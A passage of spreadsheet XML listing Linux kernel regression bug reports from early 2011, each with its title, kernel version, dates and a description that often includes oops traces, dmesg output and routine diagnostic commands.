voltage_now power_now 2049000 11093000 1312000 - after reloading battery module: $ cat energy_now voltage_now power_now 20360000 11108000 14740000 Please note I suspect this is a regression since v2.6.35 or so, but I'm having trouble bisecting because it's very time consuming. Most of the time, the error only appears after the X201 was turned off for a longer time period. Please advise if I can help, though I don't feel competent (yet) for developing a fix.</t>
  </si>
  <si>
    <t>Kernel panics with 2.6.38 (rc1, rc2, rc3, rc4) and the lzo compression of btrfs</t>
  </si>
  <si>
    <t>2.6.38-rc4</t>
  </si>
  <si>
    <t>2011-02-05 04:44 UTC</t>
  </si>
  <si>
    <t>Juan Francisco Cantero Hurtado</t>
  </si>
  <si>
    <t>2011-03-30 21:33 UTC</t>
  </si>
  <si>
    <t>I've a lot of panics with the rc1, rc2 and rc3 of kernel 2.6.38. I've a few btrfs partitions with uncompressed data and compressed data with lzo and zlib. Before of 2.6.38, I've used zlib compression for months without any problem. The bug occur with intensive IO activity and without that. "lzo1x_decompress_safe" and "last sysfs file: /sys/devices/system/cpu/cpu3/cache" appears always.</t>
  </si>
  <si>
    <t>Slow resume from suspend/hibernate on Dell Inspiron M301Z</t>
  </si>
  <si>
    <t>2011-02-05 12:37 UTC</t>
  </si>
  <si>
    <t>Luca Ferretti</t>
  </si>
  <si>
    <t>2011-03-27 19:45 UTC</t>
  </si>
  <si>
    <t>Created attachment 46452 [details] Dmesg info using pm_trace As per summary, there are issue resuming this laptop after a suspend action. It requires 5 minutes to resume. This issue was originally reported against Ubuntu 10.10 - see https://bugs.launchpad.net/ubuntu/+source/linux/+bug/658307 for more info and details - but it also occurs in previous 10.04, Fedora 14 and latest development Ubuntu Natty alpha2 I'm attaching the dmesg info from latest, dumped after running sudo sh -c "sync; echo 1 &gt; /sys/power/pm_trace; pm-suspend"</t>
  </si>
  <si>
    <t>WARNING: at include/linux/netdevice.h:1557 netif_stop_queue+0x1c/0x31</t>
  </si>
  <si>
    <t>2011-02-05 18:45 UTC</t>
  </si>
  <si>
    <t>2012-05-17 15:59 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">------------[ cut here ]------------ WARNING: at include/linux/netdevice.h:1557 netif_stop_queue+0x1c/0x31 [rt2860sta]() Hardware name: 901 Modules linked in: rt2860sta(C+) snd_timer snd_seq_device crc_ccitt snd psmouse i2c_i801 pcspkr ehci _hcd uhci_hcd </t>
  </si>
  <si>
    <t>2.6.38-rc3: FUSE (sshfs) hangs under load</t>
  </si>
  <si>
    <t>2011-02-06 20:18 UTC</t>
  </si>
  <si>
    <t>2011-02-13 11:03 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.38-rc3: FUSE (sshfs) hangs under load Submitter : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt; Date : 2011-02-01 17:54 Message-ID : 20110201175452.GB518@core.coreip.homeip.net References : http://marc.info/?l=linux-kernel&amp;m=129658291703679&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline. Caused by: commit 4cd06a344db752f513437138953af191cbe9a691 Author: Felix Fietkau &lt;nbd@openwrt.org&gt; Date: Sat Dec 18 19:30:49 2010 +0100 mac80211: skip unnecessary pskb_expand_head calls If the skb is not cloned and we don't need any extra headroom, there is no point in reallocating the skb head. Signed-off-by: Felix Fietkau &lt;nbd@openwrt.org&gt; Signed-off-by: John W. Linville &lt;linville@tuxdriver.com&gt; First-Bad-Commit : 4cd06a344db752f513437138953af191cbe9a691</t>
  </si>
  <si>
    <t>JMicron SD card DMA transfer corrupted</t>
  </si>
  <si>
    <t>post 2.6.36</t>
  </si>
  <si>
    <t>2011-02-06 22:29 UTC</t>
  </si>
  <si>
    <t>2011-05-30 08:29 UTC</t>
  </si>
  <si>
    <t>Created attachment 46662 [details] dmesg from 2.6.36.3 with sdhci.c DEBUG See http://www.mail-archive.com/linux-mmc@vger.kernel.org/msg05490.html I have an HP Pavilion dv5 laptop, which has an integrated memory card reader (labeled with "SD*MS/Pro*MMC*XD) and appearing with lspci as: 0a:00.1 System peripheral: JMicron Technology Corp. SD/MMC Host Controller 0a:00.2 SD Host controller: JMicron Technology Corp. Standard SD Host Controller 0a:00.3 System peripheral: JMicron Technology Corp. MS Host Controller 0a:00.4 System peripheral: JMicron Technology Corp. xD Host Controller I have mainly used a 1 GB SD card from puremedia, but I have seen the problem with another card as well. Basically, if I try to read image files from the card using the card reader, the images come out corrupted (having the card inside a Canon Ixus camera and reading the images via a USB cable works). --- Testing shows that also writes to the card are occasionally corrupted. When it happens, usually the transferred file begins ok, but every 4096 bytes the file might change to contain a block from some other part of the file or even binary garbage. Like so: - the source file 49.txt consists of lines 0049-0001 0049-0002 0049-0003 ... 0049-2399 0049-2400 0049-2401 The file is exactly 24010 bytes long. After transferring that file to the SD card and back (via the card reader) and taking a diff, the differences are: @@ -407,1995 +407,1992 @@ 0049-0407 0049-0408 0049-0409 -0049-0410 -0049-0411 -0049-0412 ... (all lines in between removed; each line is 10 bytes) -0049-2399 -0049-2400 -0049-2401 +0049-00049-0001 +0049-0002 +0049-0003 ... (all lines in between added) +0049-0408 +0049-0409 +0049-00049-0001 +0049-0002 +0049-0003 ... +0049-0408 +0049-0409 +0049-00049-0001 +0049-0002 +0049-0003 ... +0049-0407 +0049-0408 +0049-0409 +0049-00049-0001 +0049-0002 +0049-0003 ... +0049-0407 +0049-0408 +0049-0409 +0049-00049-0001 +0049-0002 +0049-0003 ... +0049-0351 +0049-0352 +0049-0353 dmesg from Linux 2.6.36.3 (which fails) attached, bisect results to follow</t>
  </si>
  <si>
    <t>nfsclient does not fall back to v2 synchronous mode when using O_SYNC</t>
  </si>
  <si>
    <t>2.6.32 to 2.6.38-rc3</t>
  </si>
  <si>
    <t>2011-02-07 15:38 UTC</t>
  </si>
  <si>
    <t>2011-04-15 21:30 UTC</t>
  </si>
  <si>
    <t>Testcase: Used the following in /etc/exports: /nfs_export (rw,no_root_squash,sync,no_wdelay,no_subtree_check) 1. Mount NFS mount from Client: sudo mount server:/nfs_export /nfs_mount 2. Start collecting tcpdump data on client and server. 3. Perform a simple dd to cause and NFS write (Using oflag=sync): strace -o /tmp/strace.dd.joe.out dd if=/dev/zero of=/nfs_mount/syncfile bs=1k count=1 oflag=sync 4. Review tcpdump data and notice the client does not issue the "nfs_file_sync" write requests. The oflag=sync causes the file to be opened with O_SYNC. Reading descriptions of this flag sounds like this should switch from the new UNSTABLE/COMMIT mode back to the FILE_SYNC mode. However looking at the code, it seems FILE_SYNC would only be used on retries or writeback writes for reclaim. So the question here is: Is the assumption wrong or the implementation?</t>
  </si>
  <si>
    <t>Unable to mount FAT-formatted floppy on /dev/fd0, plus WARN_ON when using /dev/fd0u1440</t>
  </si>
  <si>
    <t>2011-02-07 17:21 UTC</t>
  </si>
  <si>
    <t>2011-06-28 07:54 UTC</t>
  </si>
  <si>
    <t>Created attachment 46722 [details] Full dmesg output with oopses on floppy use Since: 2.6.38-rc1 Last working: 2.6.37 Fedora 14 x86_64 My system has a legacy 3.5-inches floppy drive (NOT an USB floppy) salvaged from an old computer. For this floppy drive, I added a line to /etc/fstab like this: /dev/fd0 /mnt/floppy auto defaults,users,noauto 0 0 This setup worked correctly under 2.6.37. Since 2.6.38-rc1, whenever I run "mount /mnt/floppy", the mount command completes with apparently no errors, but the drive is not actually mounted at all. It does not appear in the output of "df", and there are no contents under /mnt/floppy. Repeating the mount command does not work at all. If I then run (as root) the command "mount /dev/fd0u1440 /mnt/floppy", the mount really succeeds and I can see the contents of the floppy drive. However, when I try to unmount /dev/fd0u1440, I get the following WARN_ON messages: [ 2834.996302] ------------[ cut here ]------------ [ 2834.996314] WARNING: at fs/block_dev.c:1426 blkdev_put+0x8f/0x114() [ 2834.996318] Hardware name: OEM [ 2834.996321] Modules linked in: vfat fat usb_storage uas fuse ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat bridge stp llc deflate zlib_deflate ctr camellia cast5 rmd160 crypto_null ccm serpent blowfish twofish_x86_64 twofish_common ecb xcbc cbc sha256_generic sha512_generic des_generic cryptd aes_x86_64 aes_generic ah6 ah4 esp6 esp4 xfrm4_mode_beet xfrm4_tunnel tunnel4 xfrm4_mode_tunnel xfrm4_mode_transport xfrm6_mode_transport xfrm6_mode_ro xfrm6_mode_beet xfrm6_mode_tunnel ipcomp ipcomp6 xfrm_ipcomp xfrm6_tunnel tunnel6 af_key vboxnetadp vboxnetflt vboxdrv hwmon_vid coretemp sunrpc cpufreq_ondemand acpi_cpufreq freq_table mperf capi capifs kernelcapi nf_conntrack_netbios_ns ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 ip6table_filter ip6_tables ipv6 uinput snd_hda_codec_realtek snd_hda_intel ppdev snd_hda_codec parport_pc iTCO_wdt iTCO_vendor_support r8169 parport i2c_i801 snd_hwdep mii snd_seq snd_seq_device snd_pcm snd_timer snd soundcore snd_page_alloc microcode floppy pcspkr i915 drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan] [ 2834.996469] Pid: 3443, comm: umount Not tainted 2.6.38-rc3 #1 [ 2834.996473] Call Trace: [ 2834.996482] [&lt;ffffffff810515ef&gt;] ? warn_slowpath_common+0x85/0x9d [ 2834.996488] [&lt;ffffffff81051621&gt;] ? warn_slowpath_null+0x1a/0x1c [ 2834.996494] [&lt;ffffffff8114f0a9&gt;] ? blkdev_put+0x8f/0x114 [ 2834.996501] [&lt;ffffffff8112671b&gt;] ? kill_block_super+0x65/0x6a [ 2834.996507] [&lt;ffffffff81126984&gt;] ? deactivate_locked_super+0x26/0x46 [ 2834.996513] [&lt;ffffffff811274b1&gt;] ? deactivate_super+0x3a/0x3e [ 2834.996519] [&lt;ffffffff8113d00a&gt;] ? mntput_no_expire+0xd0/0xd5 [ 2834.996525] [&lt;ffffffff8113db6f&gt;] ? sys_umount+0x2e9/0x317 [ 2834.996532] [&lt;ffffffff8112db09&gt;] ? path_put+0x22/0x27 [ 2834.996539] [&lt;ffffffff8100ac82&gt;] ? system_call_fastpath+0x16/0x1b [ 2834.996544] ---[ end trace 2c364f9280e3c23f ]--- [ 2834.996547] ------------[ cut here ]------------ [ 2834.996552] WARNING: at fs/block_dev.c:1383 __blkdev_put+0x6d/0x150() [ 2834.996556] Hardware name: OEM [ 2834.996558] Modules linked in: vfat fat usb_storage uas fuse ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat bridge stp llc deflate zlib_deflate ctr camellia cast5 rmd160 crypto_null ccm serpent blowfish twofish_x86_64 twofish_common ecb xcbc cbc sha256_generic sha512_generic des_generic cryptd aes_x86_64 aes_generic ah6 ah4 esp6 esp4 xfrm4_mode_beet xfrm4_tunnel tunnel4 xfrm4_mode_tunnel xfrm4_mode_transport xfrm6_mode_transport xfrm6_mode_ro xfrm6_mode_beet xfrm6_mode_tunnel ipcomp ipcomp6 xfrm_ipcomp xfrm6_tunnel tunnel6 af_key vboxnetadp vboxnetflt vboxdrv hwmon_vid coretemp sunrpc cpufreq_ondemand acpi_cpufreq freq_table mperf capi capifs kernelcapi nf_conntrack_netbios_ns ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 ip6table_filter ip6_tables ipv6 uinput snd_hda_codec_realtek snd_hda_intel ppdev snd_hda_codec parport_pc iTCO_wdt iTCO_vendor_support r8169 parport i2c_i801 snd_hwdep mii snd_seq snd_seq_device snd_pcm snd_timer snd soundcore snd_page_alloc microcode floppy pcspkr i915 drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan] [ 2834.996692] Pid: 3443, comm: umount Tainted: G W 2.6.38-rc3 #1 [ 2834.996696] Call Trace: [ 2834.996702] [&lt;ffffffff810515ef&gt;] ? warn_slowpath_common+0x85/0x9d [ 2834.996708] [&lt;ffffffff81051621&gt;] ? warn_slowpath_null+0x1a/0x1c [ 2834.996713] [&lt;ffffffff8114ef37&gt;] ? __blkdev_put+0x6d/0x150 [ 2834.996720] [&lt;ffffffff8114f125&gt;] ? blkdev_put+0x10b/0x114 [ 2834.996725] [&lt;ffffffff8112671b&gt;] ? kill_block_super+0x65/0x6a [ 2834.996731] [&lt;ffffffff81126984&gt;] ? deactivate_locked_super+0x26/0x46 [ 2834.996737] [&lt;ffffffff811274b1&gt;] ? deactivate_super+0x3a/0x3e [ 2834.996743] [&lt;ffffffff8113d00a&gt;] ? mntput_no_expire+0xd0/0xd5 [ 2834.996748] [&lt;ffffffff8113db6f&gt;] ? sys_umount+0x2e9/0x317 [ 2834.996754] [&lt;ffffffff8112db09&gt;] ? path_put+0x22/0x27 [ 2834.996761] [&lt;ffffffff8100ac82&gt;] ? system_call_fastpath+0x16/0x1b [ 2834.996765] ---[ end trace 2c364f9280e3c240 ]--- fs/block_dev.c:1426 blkdev_put resolves to: WARN_ON_ONCE(--bdev-&gt;bd_contains-&gt;bd_holders &lt; 0); fs/block_dev.c:1383 __blkdev_put resolves to: WARN_ON_ONCE(bdev-&gt;bd_holders); After this "mount /mnt/floppy" complains about the device being busy, but no content appears under /mnt/floppy. The command "mount /dev/fd0u1440 /mnt/floppy/" still works, but unmounting it again produces the WARN_ON. Also, either "mkfs.vfat /dev/fd0" or "mkfs.vfat /dev/fd0u1440" complain about being unable to open the floppy device. If I reboot and then try to run "mkfs.vfat /dev/fd0", it appears to run normally. However, "mkfs.vfat /dev/fd0u1440" again triggers the oopses. The same happens if I try with mkfs.ext2, so it does not seem to be an issue with a particular filesystem. I have tried to bisect this, but I get a weird bisect log. It seems that "[18b022eb117e7f70c191267551ff865f278a9258] Merge branch 'for-2.6.38' of git://git.kernel.org/pub/scm/linux/kernel/git/broonie/sound-2.6 into topic/asoc" was the first bad commit, but that commit has nothing to do with filesystems or block devices. I would suspect of "[b2034d474b7e1e8578bd5c2977024b51693269d9] Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs-2.6" but that one appears to be good. I have had no issues at all with USB sticks formatted with FAT filesystems.</t>
  </si>
  <si>
    <t>[BUG] usb problems in .38-rc3+</t>
  </si>
  <si>
    <t>2.6.38-rc3+</t>
  </si>
  <si>
    <t>2011-02-07 20:30 UTC</t>
  </si>
  <si>
    <t>2011-04-25 15:39 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] usb problems in .38-rc3+ Submitter : Ed Tomlinson &lt;edt@aei.ca&gt; Date : 2011-02-05 19:17 Message-ID : 201102051417.58953.edt@aei.ca References : http://marc.info/?l=linux-kernel&amp;m=129693391417607&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>whole system hang when start X</t>
  </si>
  <si>
    <t>2.6.37+</t>
  </si>
  <si>
    <t>2011-02-08 08:33 UTC</t>
  </si>
  <si>
    <t>2011-05-30 07:53 UTC</t>
  </si>
  <si>
    <t>Ben Widawsky</t>
  </si>
  <si>
    <t>At least 2.6.36 kernel works well. My GPU is Arrandale. 2.6.37 works in most of the times. The symptom is when you start X(either bare X or kdm), the whole system hang. No keyboard response, no network response(so I could not ssh into my system to inspect what is going on)... If I add i915.modeset=0, X could not start. But in this condition, system doesn't hang. I can switch to console. There is no error message on dmesg nor X.0.log. My box is DELL Vostro3500. My distribution is Slackware-current. pkg info: mesa-7.10_84b857e-x86_64-1 xorg-server-1.9.3-x86_64-1 xf86-video-intel-2.14.0-x86_64-1 FYI, I saw the screen got teared for a little fraction of time when starting mode set on console.</t>
  </si>
  <si>
    <t>Multichannels LPCM through HDMI audio does not work anymore on NVidia cards</t>
  </si>
  <si>
    <t>2011-02-08 13:39 UTC</t>
  </si>
  <si>
    <t>dura</t>
  </si>
  <si>
    <t>2014-02-13 19:47 UTC</t>
  </si>
  <si>
    <t>I've got a GT240 NVidia card and PCM HDMI audio is limited to two channels with kernel 2.6.37. Other NVidia cards are probably affected as well. Reverting http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=53d7d69d8ffdfa60c5b66cc2e9ee0774aaaef5c0 make things going back to normal.</t>
  </si>
  <si>
    <t>Hang-ups and various DOS started by accessing partition of non-existent partitionable RAID array</t>
  </si>
  <si>
    <t>2.6.30,2.6.32</t>
  </si>
  <si>
    <t>2011-02-08 22:39 UTC</t>
  </si>
  <si>
    <t>2011-03-04 23:49 UTC</t>
  </si>
  <si>
    <t>Found while repartitioning disks: On kernel 2.6.30 mdadm -D /dev/md_d1p1 hangs on open of md_d1p1 when md_d1 is not started. After that, even access to /dev/md_d1 hangs up. Attempt to shutdown or reboot then oops in do_md_stop (kernel_shutdown_prepare is little higher on stack, so I assume it's really kernel and not some auto-stop program). Tested also tested on Ubuntu 2.6.32-28-generic-pae, result was mdadm stopped and taking 100% cpu (difference might be kernel version or some hal/udev). I can do more experiments but I don't know what would be usefull and I assume this is easily reproducable whenever you stop relying on udev (when using udev, devices for nonexistent arrays doesn't appear).</t>
  </si>
  <si>
    <t>commit 5d1d0cc breaks resume from suspend on Thinkpad X201</t>
  </si>
  <si>
    <t>2011-02-10 17:23 UTC</t>
  </si>
  <si>
    <t>2011-04-20 06:08 UTC</t>
  </si>
  <si>
    <t>Created attachment 47162 [details] configuration used while bisecting Resuming from suspend works on my Thinkpad X201 until commit 5d1d0cc87fc0887921993ea0742932e0c8adeda0 (bisected). When trying to wake up from resume, the power LED turns on, also hard disk and fan; but the screen stays black (backlight off). Computer is frozen, Alt-Sysrq hacks don't work anymore. Using /sys/power/pm_trace, "hash matches" leads to my i915 graphics adapter after reboot. My .config is attached. Please advise how I can help. N.B.: Because of a different bug (#27472) resuming doesn't work out of the box since v2.6.38-rc3 and beyond; the patch for this bug is merged *after* 5d1d0cc. Cherry-picking d344e38b2c151ca5e5e39f562017127e93912528 after every bisect step worked wonders.</t>
  </si>
  <si>
    <t>DVI attached monitor is turned off while booting linux 2.6.37 and higher</t>
  </si>
  <si>
    <t>2011-02-10 19:33 UTC</t>
  </si>
  <si>
    <t>Markus Heinz</t>
  </si>
  <si>
    <t>2012-04-16 21:37 UTC</t>
  </si>
  <si>
    <t>When booting a linux kernel 2.6.37 from kernel.org my monitor which is an Asus VW222U which is attached via DVI port is turned off just as the kernel begins booting. It stays turned off afterwards. There are messages like these in the kernel log: Feb 10 20:03:33 Darksun kernel: [drm:drm_edid_block_valid] *ERROR* EDID checksum is invalid, remainder is 96 Feb 10 20:03:33 Darksun kernel: [drm:drm_edid_block_valid] *ERROR* Raw EDID: Feb 10 20:03:33 Darksun kernel: &lt;3&gt;24 41 44 32 01 01 08 23 11 c1 66 00 00 00 00 00 $AD2...#..f..... Feb 10 20:03:33 Darksun kernel: &lt;3&gt;43 58 05 29 00 00 53 60 00 00 00 00 00 00 70 03 CX.)..S`......p. Feb 10 20:03:33 Darksun kernel: &lt;3&gt;ff 10 30 00 c8 00 01 00 00 00 00 00 00 00 00 00 ..0............. Feb 10 20:03:33 Darksun kernel: &lt;3&gt;00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ The problem persists until linux kernel 2.6.38-rc4. With linux kernel 2.6.36 everything works as expected. The above messages are not in the log and the monitor is not turned off.</t>
  </si>
  <si>
    <t>[KMS] radeon artifacts when switched to graphics during boot</t>
  </si>
  <si>
    <t>2.6.38-rc2 (branch airlied/drm-2.6.git/drm-fixes)</t>
  </si>
  <si>
    <t>2011-02-10 21:11 UTC</t>
  </si>
  <si>
    <t>2011-02-19 11:49 UTC</t>
  </si>
  <si>
    <t>I have running lines on the screen when the radeon driver takes control (see attached video from system boot). In 2.6.37 it worked fine (some old drm-radeon-testing branch), but in 2.6.38 drm-fixes it started to appear. I will attach dmesg output for both 2.6.37 and 2.6.38 with drm.debug=3.</t>
  </si>
  <si>
    <t>new avivo PLL calculation in Radeon driver fails with certain modelines</t>
  </si>
  <si>
    <t>2011-02-12 07:49 UTC</t>
  </si>
  <si>
    <t>2011-02-21 08:42 UTC</t>
  </si>
  <si>
    <t>This patch https://bugs.freedesktop.org/attachment.cgi?id=41943 fails to calculate the PLL values for certain lower dotclock modelines. I can change the code to use the legacy PLL calculation and things work again. Here's an example modeline that fails now, used to work flawless... # mario 256x224@59.19 15.2699Khz ModeLine "256x224x59.19" 5.130681 256 272 296 336 224 233 236 258 -HSync -VSync This modeline now with the newer avivo PLL calculation ends up being 133Hz instead of 59.19 and the Horizontal frequency is 39khz or so. It's basically completely wrong, way off of what it should be. Things work fine for anything that seems to have a dotclock above 12 Mhz or so, from what I suspect the newer method isn't taking into account possible lower dotclock and Horizontal frequency modelines. Thanks, Chris</t>
  </si>
  <si>
    <t>invalid opcode: 0000 [#1] SMP</t>
  </si>
  <si>
    <t>2.6.38-3.30</t>
  </si>
  <si>
    <t>2011-02-12 16:12 UTC</t>
  </si>
  <si>
    <t>njin</t>
  </si>
  <si>
    <t>2011-02-21 21:11 UTC</t>
  </si>
  <si>
    <t>running ubuntu-bug linux, after collect data , gdm crash and switch to unusable console (no cursor, only mouse pointer) that show the below 'cut here', i was able to restore this session only hitting many times ctrl+alt+f7. As apport still running i can send this. Feb 5 18:55:09 ubuntu kernel: [ 484.329356] ------------[ cut here ]------------ Feb 5 18:55:09 ubuntu kernel: [ 484.329382] kernel BUG at /build/buildd/linux-2.6.38/fs/namei.c:406! Feb 5 18:55:09 ubuntu kernel: [ 484.329395] invalid opcode: 0000 [#1] SMP Feb 5 18:55:09 ubuntu kernel: [ 484.329405] last sysfs file: /sys/devices/pci0000:00/0000:00:05.0/drm/card0/card0-VGA-1/status Feb 5 18:55:09 ubuntu kernel: [ 484.329419] CPU 0 Feb 5 18:55:09 ubuntu kernel: [ 484.329423] Modules linked in: dm_crypt lp snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm ppdev binfmt_misc snd_seq_midi snd_rawmidi arc4 snd_seq_midi_event rtl8180 snd_seq mac80211 psmouse snd_timer snd_seq_device serio_raw eeprom_93cx6 cfg80211 parport_pc edac_core ns558 snd gameport k8temp edac_mce_amd parport soundcore nv_tco snd_page_alloc i2c_nforce2 squashfs aufs nls_iso8859_1 nls_cp437 vfat fat dm_raid45 xor btrfs lzo_compress zlib_deflate libcrc32c nouveau ttm drm_kms_helper usb_storage uas drm sata_nv pata_amd forcedeth floppy i2c_algo_bit video Feb 5 18:55:09 ubuntu kernel: [ 484.329578] Feb 5 18:55:09 ubuntu kernel: [ 484.329592] Pid: 3957, comm: fuser Not tainted 2.6.38-1-generic #28-Ubuntu K8NF4G-SATA2/K8NF4G-SATA2 Feb 5 18:55:09 ubuntu kernel: [ 484.329610] RIP: 0010:[&lt;ffffffff81169bf7&gt;] [&lt;ffffffff81169bf7&gt;] nameidata_drop_rcu+0x127/0x130 Feb 5 18:55:09 ubuntu kernel: [ 484.329645] RSP: 0018:ffff880039387c68 EFLAGS: 00010246 Feb 5 18:55:09 ubuntu kernel: [ 484.329655] RAX: ffff8800150ec440 RBX: ffff880039387dc8 RCX: ffff880037578b00 Feb 5 18:55:09 ubuntu kernel: [ 484.329669] RDX: 0000000000000001 RSI: 0000000000000002 RDI: ffff880039387dc8 Feb 5 18:55:09 ubuntu kernel: [ 484.329681] RBP: ffff880039387ca8 R08: 0000000000000000 R09: 0000000000000000 Feb 5 18:55:09 ubuntu kernel: [ 484.329693] R10: 0000000000000001 R11: 0000000000000246 R12: ffff8800375593c0 Feb 5 18:55:09 ubuntu kernel: [ 484.329704] R13: ffff880037a55c40 R14: ffff880039387d28 R15: ffff8800150ec440 Feb 5 18:55:09 ubuntu kernel: [ 484.329720] FS: 00007f8a8eac6720(0000) GS:ffff88003b000000(0000) knlGS:0000000000000000 Feb 5 18:55:09 ubuntu kernel: [ 484.329733] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Feb 5 18:55:09 ubuntu kernel: [ 484.329744] CR2: 00000000025d91a8 CR3: 000000000307c000 CR4: 00000000000006f0 Feb 5 18:55:09 ubuntu kernel: [ 484.329757] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Feb 5 18:55:09 ubuntu kernel: [ 484.329769] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Feb 5 18:55:09 ubuntu kernel: [ 484.329781] Process fuser (pid: 3957, threadinfo ffff880039386000, task ffff8800150ec440) Feb 5 18:55:09 ubuntu kernel: [ 484.329794] Stack: Feb 5 18:55:09 ubuntu kernel: [ 484.329799] ffff880039387d28 ffff8800150ec440 ffff880039387ca8 ffff8800375593c0 Feb 5 18:55:09 ubuntu kernel: [ 484.329815] ffff880039387dc8 0000000000000000 ffff880039387d28 ffff8800150ec440 Feb 5 18:55:09 ubuntu kernel: [ 484.329830] ffff880039387cc8 ffffffff8116a1b5 ffff880039387dc8 0000000000000000 Feb 5 18:55:09 ubuntu kernel: [ 484.329845] Call Trace: Feb 5 18:55:09 ubuntu kernel: [ 484.329859] [&lt;ffffffff8116a1b5&gt;] force_reval_path.clone.16+0x55/0x70 Feb 5 18:55:09 ubuntu kernel: [ 484.329874] [&lt;ffffffff8116b662&gt;] link_path_walk+0xac2/0xba0 Feb 5 18:55:09 ubuntu kernel: [ 484.329894] [&lt;ffffffff81272911&gt;] ? security_inode_alloc+0x21/0x30 Feb 5 18:55:09 ubuntu kernel: [ 484.329912] [&lt;ffffffff81176768&gt;] ? inode_init_always+0x118/0x1d0 Feb 5 18:55:09 ubuntu kernel: [ 484.329926] [&lt;ffffffff8116ba3b&gt;] do_path_lookup+0x5b/0x160 Feb 5 18:55:09 ubuntu kernel: [ 484.329938] [&lt;ffffffff8116bf67&gt;] user_path_at+0x57/0xa0 Feb 5 18:55:09 ubuntu kernel: [ 484.329998] [&lt;ffffffffa025fc49&gt;] ? au_refresh_iattr+0xd9/0xf0 [aufs] Feb 5 18:55:09 ubuntu kernel: [ 484.330015] [&lt;ffffffff81162288&gt;] ? cp_new_stat+0xf8/0x110 Feb 5 18:55:09 ubuntu kernel: [ 484.330022] [&lt;ffffffff81162549&gt;] vfs_fstatat+0x39/0x70 Feb 5 18:55:09 ubuntu kernel: [ 484.330022] [&lt;ffffffff811625bb&gt;] vfs_stat+0x1b/0x20 Feb 5 18:55:09 ubuntu kernel: [ 484.330022] [&lt;ffffffff811627fa&gt;] sys_newstat+0x1a/0x40 Feb 5 18:55:09 ubuntu kernel: [ 484.330022] [&lt;ffffffff8100c002&gt;] system_call_fastpath+0x16/0x1b Feb 5 18:55:09 ubuntu kernel: [ 484.330022] Code: c3 4c 89 f7 e8 6b ef ec ff 66 90 48 8b 43 20 0f 1f 44 00 00 48 85 c0 bb f6 ff ff ff 74 cb 49 8d 7d 04 e8 4d ef ec ff 66 90 eb be &lt;0f&gt; 0b 0f 0b 0f 0b 0f 1f 00 55 48 89 e5 48 83 ec 50 48 89 5d d8 Feb 5 18:55:09 ubuntu kernel: [ 484.330022] RIP [&lt;ffffffff81169bf7&gt;] nameidata_drop_rcu+0x127/0x130 Feb 5 18:55:09 ubuntu kernel: [ 484.330022] RSP &lt;ffff880039387c68&gt; Feb 5 18:55:09 ubuntu kernel: [ 484.345384] ---[ end trace ec6078a9d8064c5f ]--- Feb 5 18:55:09 ubuntu kernel: [ 484.801391] ACPI Warning: Incorrect checksum in table [OEMB] - 0x0A, should be 0xFC (20110112/tbutils-314) Feb 5 18:55:09 ubuntu kernel: [ 484.801783] ACPI Warning: Incorrect checksum in table [OEMB] - 0x0A, should be 0xFC (20110112/tbutils-314) Feb 5 18:56:57 ubuntu acpid: client connected from 1578[0:0] Feb 5 18:56:57 ubuntu acpid: 1 client rule loaded</t>
  </si>
  <si>
    <t>Dell latitude E6510 fails to resume from S3</t>
  </si>
  <si>
    <t>2.6.38-rc4-git4</t>
  </si>
  <si>
    <t>2011-02-12 23:25 UTC</t>
  </si>
  <si>
    <t>2011-02-21 21:10 UTC</t>
  </si>
  <si>
    <t>Dell Latitude E6510 suspends to memory fine but on resume the screen stays black and everything is non-responsive. This happens with 2.6.38-rc4 and beyond. 2.6.38-rc3 resumed fine from suspend to S3. (My current stable release on this machine is 2.6.36 which suspends and resumes fine, with uptimes of many weeks). The symptoms are: 1. The screen is blank. 2. caps lock doesn't light up the caps LED. 3. ACPID based shutdown doesn't trigger when I press the shutdown button. 4. The wifi connection doesn't come up. 5. The sysrq doesn't work. 6. Only thing works is long press on the power. The things I have tried: 1. Got rid of DRM/i915 completely (all modules blacklisted). The system resumes fine (all the above things work) but the display is still blank. wifi works and I can login and troubleshoot. But no matter what I tried, I could not get the display to wake up. 2. Tried acpi_sleep=nonvs. Same behavior. 3. Tried pm-suspend from the console instead of within X. Same behavior: hard lock up with DRM/i915 and blank display without it. 4. 'vbetool post' after the resume segfaults. Does this have anything to do with recent NX changes? vbetool post never segfaulted before.</t>
  </si>
  <si>
    <t>Kernel won't boot without "noapic acpi=off"</t>
  </si>
  <si>
    <t>2.6.35.11-83</t>
  </si>
  <si>
    <t>2011-02-13 18:58 UTC</t>
  </si>
  <si>
    <t>sickness</t>
  </si>
  <si>
    <t>2012-01-18 03:13 UTC</t>
  </si>
  <si>
    <t>soft lockup in nfs_commit_inode()?</t>
  </si>
  <si>
    <t>2.6.36, 2.6.37, 2.6.38</t>
  </si>
  <si>
    <t>2011-02-13 18:59 UTC</t>
  </si>
  <si>
    <t>Roman Kononov</t>
  </si>
  <si>
    <t>2011-04-02 23:22 UTC</t>
  </si>
  <si>
